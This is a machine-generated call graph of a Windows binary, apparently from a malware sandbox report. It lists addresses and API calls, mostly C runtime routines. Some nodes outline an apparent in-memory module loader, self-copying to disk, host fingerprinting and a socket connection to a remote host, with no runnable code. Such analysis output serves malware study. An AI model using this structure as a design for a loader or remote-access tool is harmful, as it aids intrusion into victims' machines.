3295d5f 12672->12685 12674 32959b3 __fptostr 66 API calls 12673->12674 12675 3295d4d 12674->12675 12677 3295961 __fptostr 11 API calls 12675->12677 12676 3295efc 12678 3295f50 12676->12678 12679 3295f62 12676->12679 12683 3292a34 12677->12683 12680 32959b3 __fptostr 66 API calls 12678->12680 12681 329b984 __wsopen_s 129 API calls 12679->12681 12682 3295f55 12680->12682 12681->12683 12684 3295961 __fptostr 11 API calls 12682->12684 12693 3292a4f 12683->12693 12684->12683 12685->12676 12685->12678 12686 329bd0e __fassign 76 API calls 12685->12686 12687 3295ecb 12686->12687 12687->12678 12688 329bba8 __fassign 85 API calls 12687->12688 12689 3295ef5 12688->12689 12689->12676 12690 329bba8 __fassign 85 API calls 12689->12690 12691 3295f14 12690->12691 12691->12676 12692 329bba8 __fassign 85 API calls 12691->12692 12692->12676 12694 32949c2 __fsopen LeaveCriticalSection LeaveCriticalSection 12693->12694 12695 3292a57 12694->12695 12695->12653 12697 3294961 12696->12697 12698 3294983 EnterCriticalSection 12696->12698 12697->12698 12699 3294969 12697->12699 12700 3292b40 12698->12700 12701 329a278 __lock 66 API calls 12699->12701 12702 3292a70 12700->12702 12701->12700 12703 3292a90 12702->12703 12704 3292a80 12702->12704 12706 3292aa2 12703->12706 12717 3292b76 12703->12717 12705 32959b3 __fptostr 66 API calls 12704->12705 12707 3292a85 12705->12707 12734 32963a1 12706->12734 12714 3292b6c 12707->12714 12712 3292ae2 12747 32962a7 12712->12747 12772 32949c2 12714->12772 12716 3292b74 12716->12605 12718 3292b89 12717->12718 12719 3292ba1 12717->12719 12721 32959b3 __fptostr 66 API calls 12718->12721 12720 329637b __filbuf 66 API calls 12719->12720 12722 3292ba8 12720->12722 12723 3292b8e 12721->12723 12725 32962a7 __write 71 API calls 12722->12725 12724 3295961 __fptostr 11 API calls 12723->12724 12733 3292b99 12724->12733 12726 3292bbf 12725->12726 12727 3292bf1 12726->12727 12728 3292c31 12726->12728 12726->12733 12730 32962a7 __write 71 API calls 12727->12730 12727->12733 12729 32959b3 __fptostr 66 API calls 12728->12729 12729->12733 12731 3292c8c 12730->12731 12732 32962a7 __write 71 API calls 12731->12732 12731->12733 12732->12733 12733->12706 12735 32963ba 12734->12735 12739 3292ab0 12734->12739 12736 329637b __filbuf 66 API calls 12735->12736 12735->12739 12737 32963d5 12736->12737 12738 3298cca __write 97 API calls 12737->12738 12738->12739 12740 329637b 12739->12740 12741 329639c 12740->12741 12742 3296387 12740->12742 12741->12712 12743 32959b3 __fptostr 66 API calls 12742->12743 12744 329638c 12743->12744 12745 3295961 __fptostr 11 API calls 12744->12745 12746 3296397 12745->12746 12746->12712 12748 32962b3 ___lock_fhandle 12747->12748 12749 32962bb 12748->12749 12750 32962d6 12748->12750 12751 32959c6 __write 66 API calls 12749->12751 12752 32962e2 12750->12752 12757 329631c 12750->12757 12753 32962c0 12751->12753 12754 32959c6 __write 66 API calls 12752->12754 12755 32959b3 __fptostr 66 API calls 12753->12755 12756 32962e7 12754->12756 12767 32962c8 ___lock_fhandle 12755->12767 12759 32959b3 __fptostr 66 API calls 12756->12759 12758 329bfd7 ___lock_fhandle 68 API calls 12757->12758 12760 3296322 12758->12760 12761 32962ef 12759->12761 12762 3296330 12760->12762 12763 3296344 12760->12763 12764 3295961 __fptostr 11 API calls 12761->12764 12765 3296232 __lseek_nolock 68 API calls 12762->12765 12766 32959b3 __fptostr 66 API calls 12763->12766 12764->12767 12768 329633c 12765->12768 12769 3296349 12766->12769 12767->12707 12771 3296373 __write LeaveCriticalSection 12768->12771 12770 32959c6 __write 66 API calls 12769->12770 12770->12768 12771->12767 12773 32949d3 12772->12773 12774 32949f2 LeaveCriticalSection 12772->12774 12773->12774 12775 32949da 12773->12775 12774->12716 12776 329a19f _doexit LeaveCriticalSection 12775->12776 12777 32949ef 12776->12777 12777->12716 12779 32949c2 __fsopen 2 API calls 12778->12779 12780 3292d6d 12779->12780 12780->12618 12782 3292f37 ___lock_fhandle 12781->12782 12783 3292f78 12782->12783 12784 3292f4b _memset 12782->12784 12785 3292f70 ___lock_fhandle 12782->12785 12786 329494f __lock_file 67 API calls 12783->12786 12788 32959b3 __fptostr 66 API calls 12784->12788 12785->12621 12787 3292f80 12786->12787 12794 3292d6f 12787->12794 12790 3292f65 12788->12790 12792 3295961 __fptostr 11 API calls 12790->12792 12792->12785 12796 3292d8d _memset 12794->12796 12801 3292da7 12794->12801 12795 3292d97 12797 32959b3 __fptostr 66 API calls 12795->12797 12796->12795 12798 3292de2 12796->12798 12796->12801 12807 3292d9c 12797->12807 12800 32967cc __filbuf 79 API calls 12798->12800 12798->12801 12802 3292eed _memset 12798->12802 12803 329637b __filbuf 66 API calls 12798->12803 12804 3296f9b _memcpy_s 66 API calls 12798->12804 12806 3296ea5 __read 79 API calls 12798->12806 12799 3295961 __fptostr 11 API calls 12799->12801 12800->12798 12808 3292faf 12801->12808 12805 32959b3 __fptostr 66 API calls 12802->12805 12803->12798 12804->12798 12805->12807 12806->12798 12807->12799 12809 32949c2 __fsopen LeaveCriticalSection LeaveCriticalSection 12808->12809 12810 3292fb7 12809->12810 12810->12785 12812 3292ffb 12811->12812 12813 3292fe7 12811->12813 12815 32963a1 __flush 97 API calls 12812->12815 12819 3292ff7 12812->12819 12814 32959b3 __fptostr 66 API calls 12813->12814 12816 3292fec 12814->12816 12818 3293007 12815->12818 12817 3295961 __fptostr 11 API calls 12816->12817 12817->12819 12830 32971ea 12818->12830 12827 32930af 12819->12827 12822 329637b __filbuf 66 API calls 12823 3293015 12822->12823 12834 3297126 12823->12834 12825 329301b 12825->12819 12826 329353a _free 66 API calls 12825->12826 12826->12819 12828 32949c2 __fsopen 2 API calls 12827->12828 12829 32930b5 12828->12829 12829->12631 12831 329300f 12830->12831 12832 32971fa 12830->12832 12831->12822 12832->12831 12833 329353a _free 66 API calls 12832->12833 12833->12831 12835 3297132 ___lock_fhandle 12834->12835 12836 329713a 12835->12836 12837 3297155 12835->12837 12838 32959c6 __write 66 API calls 12836->12838 12839 3297161 12837->12839 12842 329719b 12837->12842 12840 329713f 12838->12840 12841 32959c6 __write 66 API calls 12839->12841 12843 32959b3 __fptostr 66 API calls 12840->12843 12844 3297166 12841->12844 12845 329bfd7 ___lock_fhandle 68 API calls 12842->12845 12846 3297147 ___lock_fhandle 12843->12846 12847 32959b3 __fptostr 66 API calls 12844->12847 12849 32971a1 12845->12849 12846->12825 12848 329716e 12847->12848 12850 3295961 __fptostr 11 API calls 12848->12850 12851 32971bb 12849->12851 12852 32971af 12849->12852 12850->12846 12854 32959b3 __fptostr 66 API calls 12851->12854 12853 329708a __close_nolock 69 API calls 12852->12853 12855 32971b5 12853->12855 12854->12855 12856 32971e2 __close LeaveCriticalSection 12855->12856 12856->12846 12858 32a5f3a ctype 12857->12858 12859 32a5f33 ___DllMainCRTStartup 12857->12859 12907 32a5390 12858->12907 12860 32920e4 __fltout2 5 API calls 12859->12860 12862 32a62d0 12860->12862 12863 32a5f5b 12863->12859 12864 32a5f7f 12863->12864 12865 32a62d6 12863->12865 12924 32a4fa0 12864->12924 12866 32a4fa0 85 API calls 12865->12866 12905 32a6265 ctype 12866->12905 12868 32a4fa0 85 API calls 12876 32a6131 12868->12876 12870 32a615d 12871 32a4fa0 85 API calls 12870->12871 12873 32a6170 12871->12873 12872 32a5f89 12874 32a4e40 ___DllMainCRTStartup 19 API calls 12872->12874 12896 32a6110 12872->12896 12875 32a4fa0 85 API calls 12873->12875 12877 32a5fb9 12874->12877 12882 32a617e 12875->12882 12876->12870 12878 32910e0 77 API calls 12876->12878 12929 3291f20 12877->12929 12880 32a614c 12878->12880 12939 3291510 12880->12939 12883 3291f20 77 API calls 12882->12883 12882->12905 12885 32a61c8 12883->12885 12884 32a5fc4 12887 32a602c _memset 12884->12887 12933 32910e0 12884->12933 12955 3291890 12885->12955 12889 32a6046 GetModuleFileNameA 12887->12889 12937 3292970 12889->12937 12892 32910e0 77 API calls 12894 32a600d 12892->12894 12897 32a4d80 ___DllMainCRTStartup 18 API calls 12894->12897 12895 32a60ae GetFileSize 12898 32a6109 CloseHandle 12895->12898 12901 32a60c1 ___DllMainCRTStartup 12895->12901 12896->12868 12897->12887 12898->12896 12899 32a61e0 ctype 12900 3291f20 77 API calls 12899->12900 12899->12905 12902 32a6250 12900->12902 12901->12898 12904 32a60ee WriteFile 12901->12904 12963 32a5ea0 12902->12963 12906 32a6106 ___DllMainCRTStartup 12904->12906 12967 32a4f20 12905->12967 12906->12898 12908 32a53a1 12907->12908 12909 32a53a7 12907->12909 12908->12863 12910 32a53bc VirtualAlloc 12909->12910 12911 32a53b5 12909->12911 12912 32a53db VirtualAlloc 12910->12912 12913 32a53f3 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc 12910->12913 12911->12863 12912->12913 12914 32a54aa 12912->12914 12915 32a544c _memcpy_s 12913->12915 12914->12863 12976 32a52e0 12915->12976 12917 32a5462 12981 32a5050 LoadLibraryA GetProcAddress 12917->12981 12920 32a548a 12922 32a4f20 70 API calls 12920->12922 12923 32a54b3 12920->12923 12922->12914 12923->12863 12925 32a4fba 12924->12925 12926 32a4fb4 12924->12926 12927 32a1c18 ___DllMainCRTStartup 85 API calls 12925->12927 12928 32a5011 12925->12928 12926->12872 12927->12925 12928->12872 12930 3291f40 12929->12930 12930->12930 12994 3291e50 12930->12994 12932 3291f50 12932->12884 12934 32910f0 12933->12934 12934->12934 12935 3291510 77 API calls 12934->12935 12936 3291102 12935->12936 12936->12892 12938 3292993 wsprintfA CreateFileA 12937->12938 12938->12895 12938->12896 12940 3291570 12939->12940 12943 329151d 12939->12943 12941 3291589 12940->12941 12942 3292029 std::_Xinvalid_argument 67 API calls 12940->12942 12944 32915a4 12941->12944 12945 3292029 std::_Xinvalid_argument 67 API calls 12941->12945 12946 32915b3 _memcpy_s 12941->12946 12942->12941 12943->12940 12948 3291543 12943->12948 12944->12946 12947 3291c30 77 API calls 12944->12947 12945->12944 12946->12870 12947->12946 12949 3291548 12948->12949 12950 329155c 12948->12950 13040 3291740 12949->13040 12952 3291740 77 API calls 12950->12952 12954 329156a 12952->12954 12953 3291556 12953->12870 12954->12870 12956 32918ec 12955->12956 12960 32918fb 12955->12960 12956->12960 13057 3291da0 12956->13057 12957 3291740 77 API calls 12959 3291920 12957->12959 12961 3291510 77 API calls 12959->12961 12960->12957 12962 329192e 12961->12962 12962->12899 12964 32a5eb5 12963->12964 12965 32a5ee7 12964->12965 13064 3291200 12964->13064 12965->12905 12968 32a4f99 12967->12968 12973 32a4f27 12967->12973 12968->12859 12969 32a4f71 12970 32a4f7b VirtualFree 12969->12970 12971 32a4f89 GetProcessHeap HeapFree 12969->12971 12970->12971 12971->12968 12972 32a4f67 12974 329353a _free 66 API calls 12972->12974 12973->12969 12973->12972 12975 32a4f5c FreeLibrary 12973->12975 12974->12969 12975->12973 12979 32a5305 _memset _memcpy_s 12976->12979 12980 32a537b 12976->12980 12977 32a5338 VirtualAlloc 12977->12979 12978 32a5316 VirtualAlloc 12978->12979 12979->12977 12979->12978 12979->12980 12980->12917 12985 32a5161 12981->12985 12987 32a5095 12981->12987 12982 32a5179 12982->12920 12989 32a5210 12982->12989 12983 32a5172 FreeLibrary 12983->12982 12984 32a50bb LoadLibraryA 12984->12985 12984->12987 12985->12982 12985->12983 12986 329348d __realloc_crt 69 API calls 12986->12987 12987->12984 12987->12985 12987->12986 12988 32a512a GetProcAddress 12987->12988 12988->12985 12988->12987 12990 32a52d3 12989->12990 12992 32a5237 12989->12992 12990->12920 12991 32a525e VirtualFree 12991->12992 12992->12990 12992->12991 12993 32a52a8 VirtualProtect 12992->12993 12993->12992 12995 3291ea2 12994->12995 12998 3291e57 12994->12998 12996 3291eb1 12995->12996 13022 3292029 12995->13022 13000 3291ec3 _memcpy_s 12996->13000 13029 3291c30 12996->13029 12998->12995 13001 3291e7d 12998->13001 13000->12932 13002 3291e92 13001->13002 13003 3291e82 13001->13003 13005 3291aa0 77 API calls 13002->13005 13008 3291aa0 13003->13008 13007 3291ea0 13005->13007 13006 3291e90 13006->12932 13007->12932 13009 3291abb 13008->13009 13010 3291ab1 13008->13010 13012 3291ae3 13009->13012 13013 3291ac7 13009->13013 13011 3292076 std::_Xinvalid_argument 67 API calls 13010->13011 13011->13009 13015 3291af2 13012->13015 13017 3292029 std::_Xinvalid_argument 67 API calls 13012->13017 13014 3291a30 67 API calls 13013->13014 13016 3291ad2 13014->13016 13018 3291b04 _memcpy_s 13015->13018 13020 3291c30 77 API calls 13015->13020 13019 3291a30 67 API calls 13016->13019 13017->13015 13018->13006 13021 3291adb 13019->13021 13020->13018 13021->13006 13023 329283b std::exception::exception 66 API calls 13022->13023 13024 3292043 13023->13024 13025 3293c0e __CxxThrowException@8 RaiseException 13024->13025 13026 3292058 13025->13026 13027 32928c9 std::exception::exception 66 API calls 13026->13027 13028 3292069 13027->13028 13028->12996 13030 3291c6b 13029->13030 13032 32928ee ___DllMainCRTStartup 77 API calls 13030->13032 13034 3291cad 13030->13034 13036 3291cb4 _memcpy_s ctype 13030->13036 13031 329283b std::exception::exception 66 API calls 13033 3291ccc 13031->13033 13032->13034 13035 3293c0e __CxxThrowException@8 RaiseException 13033->13035 13034->13031 13034->13036 13037 3291ce1 13035->13037 13036->13000 13038 3291be0 77 API calls 13037->13038 13039 3291cf6 13038->13039 13039->13000 13041 329175d 13040->13041 13042 3291753 13040->13042 13044 329177b 13041->13044 13045 3292029 std::_Xinvalid_argument 67 API calls 13041->13045 13050 3292076 13042->13050 13046 3291796 13044->13046 13047 3292029 std::_Xinvalid_argument 67 API calls 13044->13047 13049 32917a5 _memcpy_s 13044->13049 13045->13044 13048 3291c30 77 API calls 13046->13048 13046->13049 13047->13046 13048->13049 13049->12953 13051 329283b std::exception::exception 66 API calls 13050->13051 13052 3292090 13051->13052 13053 3293c0e __CxxThrowException@8 RaiseException 13052->13053 13054 32920a5 13053->13054 13055 32928c9 std::exception::exception 66 API calls 13054->13055 13056 32920b6 13055->13056 13056->13041 13058 3291db9 13057->13058 13059 3291daf 13057->13059 13061 3291dd9 _memcpy_s ctype 13058->13061 13062 3291c30 77 API calls 13058->13062 13060 3292029 std::_Xinvalid_argument 67 API calls 13059->13060 13060->13058 13061->12960 13063 3291dcb 13062->13063 13063->12960 13065 32913c8 13064->13065 13068 329121f 13064->13068 13066 3292076 std::_Xinvalid_argument 67 API calls 13065->13066 13067 32913d2 13066->13067 13069 3292029 std::_Xinvalid_argument 67 API calls 13068->13069 13071 329124f 13068->13071 13069->13071 13070 3291270 13073 3291c30 77 API calls 13070->13073 13074 3291286 _memcpy_s _memmove 13070->13074 13071->13070 13072 3292029 std::_Xinvalid_argument 67 API calls 13071->13072 13071->13074 13072->13070 13073->13074 13074->12964 13076 329445f __getptd_noexit 66 API calls 13075->13076 13077 329843a 13076->13077 13078 3298440 13077->13078 13080 3298464 13077->13080 13082 329721b __malloc_crt 66 API calls 13077->13082 13079 32959b3 __fptostr 66 API calls 13078->13079 13078->13080 13081 3298445 13079->13081 13080->12484 13081->12484 13082->13078 13084 32936fe 13083->13084 13085 3293711 _memset 13083->13085 13086 32959b3 __fptostr 66 API calls 13084->13086 13089 3293729 13085->13089 13094 329373a 13085->13094 13087 3293703 13086->13087 13088 3295961 __fptostr 11 API calls 13087->13088 13123 329370d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 13088->13123 13090 32959b3 __fptostr 66 API calls 13089->13090 13091 329372e 13090->13091 13097 3295961 __fptostr 11 API calls 13091->13097 13092 3293758 13095 32959b3 __fptostr 66 API calls 13092->13095 13093 3293769 13124 3297f66 13093->13124 13094->13092 13094->13093 13095->13123 13097->13123 13098 329376e 13132 329822f 13098->13132 13100 3293777 13101 329395f 13100->13101 13139 329825c 13100->13139 13102 329590f __invoke_watson 10 API calls 13101->13102 13104 3293969 13102->13104 13107 3298432 __localtime64_s 66 API calls 13104->13107 13105 3293789 13105->13101 13146 3298289 13105->13146 13109 3293975 13107->13109 13108 329379b 13108->13101 13110 32937a4 13108->13110 13111 3293984 13109->13111 13113 32936e2 __localtime64_s 102 API calls 13109->13113 13112 3293817 13110->13112 13115 32937b7 13110->13115 13111->12485 13114 3297ff6 __gmtime64_s 66 API calls 13112->13114 13113->13111 13116 329381e 13114->13116 13153 3297ff6 13115->13153 13119 3297fb5 __localtime64_s 66 API calls 13116->13119 13116->13123 13118 32937cf 13118->13123 13162 3297fb5 13118->13162 13119->13123 13121 32937e4 13122 3297ff6 __gmtime64_s 66 API calls 13121->13122 13121->13123 13122->13123 13123->12485 13125 3297f72 ___lock_fhandle 13124->13125 13126 3297fa6 ___lock_fhandle 13125->13126 13127 329a278 __lock 66 API calls 13125->13127 13126->13098 13128 3297f83 13127->13128 13129 3297f94 13128->13129 13170 3297885 13128->13170 13199 3297fac 13129->13199 13133 329823b 13132->13133 13134 3298250 13132->13134 13135 32959b3 __fptostr 66 API calls 13133->13135 13134->13100 13136 3298240 13135->13136 13137 3295961 __fptostr 11 API calls 13136->13137 13138 329824b 13137->13138 13138->13100 13140 3298268 13139->13140 13141 329827d 13139->13141 13142 32959b3 __fptostr 66 API calls 13140->13142 13141->13105 13143 329826d 13142->13143 13144 3295961 __fptostr 11 API calls 13143->13144 13145 3298278 13144->13145 13145->13105 13147 32982aa 13146->13147 13148 3298295 13146->13148 13147->13108 13149 32959b3 __fptostr 66 API calls 13148->13149 13150 329829a 13149->13150 13151 3295961 __fptostr 11 API calls 13150->13151 13152 32982a5 13151->13152 13152->13108 13154 329800a 13153->13154 13155 3298020 _memset 13153->13155 13156 32959b3 __fptostr 66 API calls 13154->13156 13155->13154 13160 3298037 13155->13160 13157 329800f 13156->13157 13158 3295961 __fptostr 11 API calls 13157->13158 13159 3298019 __gmtime64_s __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13158->13159 13159->13118 13160->13159 13161 32959b3 __fptostr 66 API calls 13160->13161 13161->13159 13163 3297fc1 ___lock_fhandle 13162->13163 13164 329a278 __lock 66 API calls 13163->13164 13165 3297fc8 13164->13165 13217 3297d8f 13165->13217 13169 3297fe4 ___lock_fhandle 13169->13121 13171 3297891 ___lock_fhandle 13170->13171 13172 329a278 __lock 66 API calls 13171->13172 13173 32978ac __tzset_nolock 13172->13173 13174 3298289 __tzset_nolock 66 API calls 13173->13174 13175 32978c1 13174->13175 13177 329822f __tzset_nolock 66 API calls 13175->13177 13189 329797e __tzset_nolock 13175->13189 13176 329590f __invoke_watson 10 API calls 13176->13189 13178 32978d3 13177->13178 13180 329825c __tzset_nolock 66 API calls 13178->13180 13178->13189 13179 32979a9 GetTimeZoneInformation 13179->13189 13182 32978e5 13180->13182 13181 329353a _free 66 API calls 13181->13189 13182->13189 13202 329cde6 13182->13202 13184 3297a10 WideCharToMultiByte 13184->13189 13187 3297a48 WideCharToMultiByte 13187->13189 13188 3297915 __tzset_nolock 13188->13189 13191 329794c _strlen 13188->13191 13194 329353a _free 66 API calls 13188->13194 13189->13176 13189->13179 13189->13181 13189->13184 13189->13187 13192 329ccaa 66 API calls __tzset_nolock 13189->13192 13197 3297b79 ___lock_fhandle __tzset_nolock 13189->13197 13198 329cc94 79 API calls __tzset_nolock 13189->13198 13213 3297b08 13189->13213 13193 329721b __malloc_crt 66 API calls 13191->13193 13192->13189 13195 329795a _strlen 13193->13195 13194->13191 13195->13189 13196 3295bef _strcpy_s 66 API calls 13195->13196 13196->13189 13197->13129 13198->13189 13216 329a19f LeaveCriticalSection 13199->13216 13201 3297fb3 13201->13126 13203 32944d8 __getptd 66 API calls 13202->13203 13204 329cdeb 13203->13204 13205 32978f3 13204->13205 13206 329a56b _LocaleUpdate::_LocaleUpdate 74 API calls 13204->13206 13207 329cd5f 13205->13207 13206->13205 13208 329cd78 13207->13208 13210 329cd74 13207->13210 13209 329ebb4 ___wtomb_environ 99 API calls 13208->13209 13208->13210 13211 329cd8a _strlen 13208->13211 13209->13211 13210->13188 13211->13210 13212 329eb9a __fassign 91 API calls 13211->13212 13212->13211 13214 329a19f _doexit LeaveCriticalSection 13213->13214 13215 3297b0f 13214->13215 13215->13189 13216->13201 13218 329822f __tzset_nolock 66 API calls 13217->13218 13219 3297da6 13218->13219 13220 3297f5b 13219->13220 13221 3297daf 13219->13221 13222 329590f __invoke_watson 10 API calls 13220->13222 13224 3297ddf 13221->13224 13225 3297e97 13221->13225 13231 3297e92 13221->13231 13223 3297f65 13222->13223 13236 3297b98 13224->13236 13226 3297b98 _cvtdate 66 API calls 13225->13226 13227 3297ed0 13226->13227 13229 3297b98 _cvtdate 66 API calls 13227->13229 13229->13231 13230 3297e35 13232 3297b98 _cvtdate 66 API calls 13230->13232 13233 3297fed 13231->13233 13232->13231 13258 329a19f LeaveCriticalSection 13233->13258 13235 3297ff4 13235->13169 13238 3297bb8 13236->13238 13237 329825c __tzset_nolock 66 API calls 13239 3297d39 13237->13239 13238->13237 13240 3297d0d 13238->13240 13239->13240 13241 329590f __invoke_watson 10 API calls 13239->13241 13240->13230 13242 3297d8e 13241->13242 13243 329822f __tzset_nolock 66 API calls 13242->13243 13244 3297da6 13243->13244 13245 3297f5b 13244->13245 13246 3297daf 13244->13246 13247 329590f __invoke_watson 10 API calls 13245->13247 13249 3297ddf 13246->13249 13250 3297e97 13246->13250 13254 3297e92 13246->13254 13248 3297f65 13247->13248 13253 3297b98 _cvtdate 66 API calls 13249->13253 13251 3297b98 _cvtdate 66 API calls 13250->13251 13252 3297ed0 13251->13252 13255 3297b98 _cvtdate 66 API calls 13252->13255 13256 3297e35 13253->13256 13254->13230 13255->13254 13257 3297b98 _cvtdate 66 API calls 13256->13257 13257->13254 13258->13235 13260 329701c GetComputerNameA 13259->13260 13260->12490 13260->12491 13262 32a49a8 13261->13262 13263 32a49e3 ___DllMainCRTStartup 13262->13263 13264 32a49c7 lstrlenA 13262->13264 13265 32a49fe FreeLibrary 13263->13265 13266 32a4a05 13263->13266 13264->13263 13265->13266 13266->12495 13268 32a437f __write_nolock 13267->13268 13296 32a7150 WSAStartup InitializeCriticalSection CreateEventA 13268->13296 13271 32a46ac 13394 32a70a0 13271->13394 13275 32920e4 __fltout2 5 API calls 13276 32a46d5 13275->13276 13277 32a4410 CreateEventA 13280 32a4487 GetTickCount GetTickCount 13277->13280 13287 32a43d6 _memset _strncpy 13277->13287 13278 32a4400 Sleep 13279 32a469c GetTickCount 13278->13279 13279->13271 13279->13287 13320 32a4020 13280->13320 13282 32a458f WaitForSingleObject 13286 32a4642 Sleep 13282->13286 13291 32a44c5 13282->13291 13283 32a44d0 7 API calls 13284 32a458a 13283->13284 13285 32a4572 CloseHandle 13283->13285 13284->13279 13289 32a4680 CloseHandle 13284->13289 13285->13284 13285->13285 13288 32a464d Sleep 13286->13288 13287->13271 13287->13277 13287->13278 13287->13280 13303 32a7880 13287->13303 13288->13284 13289->13284 13289->13289 13291->13282 13291->13283 13291->13288 13292 32a45cb GetLastInputInfo GetTickCount 13291->13292 13294 32a462b WaitForSingleObject 13291->13294 13357 32a3ee0 13291->13357 13372 32a7260 EnterCriticalSection 13292->13372 13294->13286 13294->13291 13297 329269a __time64 GetSystemTimeAsFileTime 13296->13297 13298 32a71e1 13297->13298 13406 3292667 13298->13406 13301 32920e4 __fltout2 5 API calls 13302 32a43b5 GetTickCount 13301->13302 13302->13271 13302->13287 13409 32a6ef0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 13303->13409 13305 32a789c ResetEvent socket 13306 32a78dc gethostbyname 13305->13306 13307 32a78c7 13305->13307 13306->13307 13309 32a78e9 htons inet_ntoa 13306->13309 13308 32920e4 __fltout2 5 API calls 13307->13308 13310 32a78d6 13308->13310 13410 32926eb 13309->13410 13310->13287 13312 32a791e connect 13312->13307 13313 32a7939 getsockname 13312->13313 13314 3297010 _memset 13313->13314 13315 32a7973 inet_ntoa wsprintfA setsockopt 13314->13315 13316 32a79de CreateThread 13315->13316 13317 32a79ad WSAIoctl 13315->13317 13318 32920e4 __fltout2 5 API calls 13316->13318 13490 32a76d0 13316->13490 13317->13316 13319 32a7a0e 13318->13319 13319->13287 13321 32a4069 _memset _strncpy 13320->13321 13322 32a4086 inet_addr 13321->13322 13323 32a4e40 ___DllMainCRTStartup 19 API calls 13322->13323 13324 32a40a3 13323->13324 13325 32a40b5 gethostname 13324->13325 13326 32a40c4 _strncpy 13324->13326 13325->13326 13543 32a3850 13326->13543 13329 32a4114 13330 32a412b 13329->13330 13331 32a4124 FreeLibrary 13329->13331 13549 32a3720 6 API calls 13330->13549 13331->13330 13335 32a4174 _strncpy 13562 32a3d30 13335->13562 13337 32a41a3 _strncpy 13338 32a41b2 GetTickCount wsprintfA 13337->13338 13339 32a4e40 ___DllMainCRTStartup 19 API calls 13338->13339 13340 32a4219 _strncpy 13339->13340 13341 3291aa0 77 API calls 13340->13341 13342 32a4246 _memset _strncpy 13340->13342 13341->13342 13570 32a3620 SHGetSpecialFolderPathA 13342->13570 13345 32a4e40 ___DllMainCRTStartup 19 API calls 13346 32a42ae 13345->13346 13346->13346 13347 32a42da GetFileAttributesA 13346->13347 13348 32a42bc 13346->13348 13349 32a42ec 13347->13349 13351 32a42c8 _strncpy 13347->13351 13350 32a4e40 ___DllMainCRTStartup 19 API calls 13348->13350 13349->13351 13352 32a42f0 lstrcpyA 13349->13352 13350->13351 13353 32a7260 79 API calls 13351->13353 13352->13351 13354 32a4319 ctype 13353->13354 13355 32920e4 __fltout2 5 API calls 13354->13355 13356 32a434d 13355->13356 13356->13291 13358 32a3f1d 13357->13358 13366 32a3fce ctype 13357->13366 13361 32a3f2a 13358->13361 13362 32a3fe2 13358->13362 13359 32920e4 __fltout2 5 API calls 13360 32a400f 13359->13360 13360->13291 13363 3291e50 77 API calls 13361->13363 13364 32a7260 79 API calls 13362->13364 13365 32a3f4d 13363->13365 13364->13366 13367 3291aa0 77 API calls 13365->13367 13369 32a3f6e _memcpy_s ___DllMainCRTStartup 13365->13369 13366->13359 13367->13369 13368 3291aa0 77 API calls 13368->13366 13370 32a7260 79 API calls 13369->13370 13371 32a3fb1 ___DllMainCRTStartup 13369->13371 13370->13371 13371->13368 13373 32a72b3 13372->13373 13374 32a72a6 VirtualFree 13372->13374 13591 3292679 13373->13591 13374->13373 13377 32a7ba0 70 API calls 13378 32a72f6 13377->13378 13379 32a7ba0 70 API calls 13378->13379 13380 32a7317 wsprintfA 13379->13380 13381 32a7340 13380->13381 13381->13381 13382 32a6ff0 5 API calls 13381->13382 13383 32a7358 13382->13383 13384 32a7ba0 70 API calls 13383->13384 13385 32a7387 _memcpy_s 13384->13385 13386 32a7ba0 70 API calls 13385->13386 13387 32a73b6 _memcpy_s 13386->13387 13387->13387 13388 32a6ff0 5 API calls 13387->13388 13389 32a73fb 13388->13389 13594 32a6e20 13389->13594 13392 32920e4 __fltout2 5 API calls 13393 32a4602 GetTickCount 13392->13393 13393->13286 13393->13291 13395 32a70ba 13394->13395 13396 32a70bf 13394->13396 13605 32a6ef0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 13395->13605 13398 32a70cf WaitForSingleObject CloseHandle 13396->13398 13399 32a70e1 CloseHandle DeleteCriticalSection WSACleanup 13396->13399 13398->13399 13400 32a711b 13399->13400 13401 32a7111 VirtualFree 13399->13401 13402 32a7129 VirtualFree 13400->13402 13403 32a7133 13400->13403 13401->13400 13402->13403 13404 32a46b5 13403->13404 13405 32a7141 VirtualFree 13403->13405 13404->13275 13405->13404 13407 32944d8 __getptd 66 API calls 13406->13407 13408 3292671 13407->13408 13408->13301 13409->13305 13411 32926f7 ___lock_fhandle 13410->13411 13412 329271a __stbuf 13411->13412 13413 3292705 13411->13413 13427 3294990 13412->13427 13414 32959b3 __fptostr 66 API calls 13413->13414 13415 329270a 13414->13415 13416 3295961 __fptostr 11 API calls 13415->13416 13419 3292715 ___lock_fhandle 13416->13419 13418 329272c __stbuf 13432 3294a2d 13418->13432 13419->13312 13421 329273e __stbuf 13439 3294c2b 13421->13439 13423 3292756 __stbuf 13465 3294ac9 13423->13465 13428 329499d 13427->13428 13429 32949b3 EnterCriticalSection 13427->13429 13430 329a278 __lock 66 API calls 13428->13430 13429->13418 13431 32949a6 13430->13431 13431->13418 13433 329637b __filbuf 66 API calls 13432->13433 13434 3294a3c 13433->13434 13473 329ad64 13434->13473 13436 3294a42 __stbuf 13437 329721b __malloc_crt 66 API calls 13436->13437 13438 3294a8f 13436->13438 13437->13438 13438->13421 13440 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 13439->13440 13441 3294c92 13440->13441 13442 3294c96 13441->13442 13445 329637b __filbuf 66 API calls 13441->13445 13455 3294ccd __output_l __aulldvrm _strlen 13441->13455 13443 32959b3 __fptostr 66 API calls 13442->13443 13444 3294c9b 13443->13444 13446 3295961 __fptostr 11 API calls 13444->13446 13445->13455 13447 3294ca6 13446->13447 13448 32920e4 __fltout2 5 API calls 13447->13448 13449 32957b2 13448->13449 13449->13423 13451 329353a _free 66 API calls 13451->13455 13452 3295033 13453 3295322 DecodePointer 13452->13453 13456 329721b __malloc_crt 66 API calls 13452->13456 13458 3295070 13452->13458 13454 3295371 13453->13454 13457 329539d 13454->13457 13459 329538b DecodePointer 13454->13459 13455->13442 13455->13447 13455->13451 13455->13452 13462 3294bb7 97 API calls _write_string 13455->13462 13463 3294b84 97 API calls __output_l 13455->13463 13464 329af32 78 API calls __cftof 13455->13464 13482 329af4f 13455->13482 13456->13458 13460 32953be 13457->13460 13461 32953ac DecodePointer 13457->13461 13458->13453 13459->13457 13460->13423 13461->13460 13462->13455 13463->13455 13464->13455 13466 3294ad4 13465->13466 13468 3292767 13465->13468 13467 32963a1 __flush 97 API calls 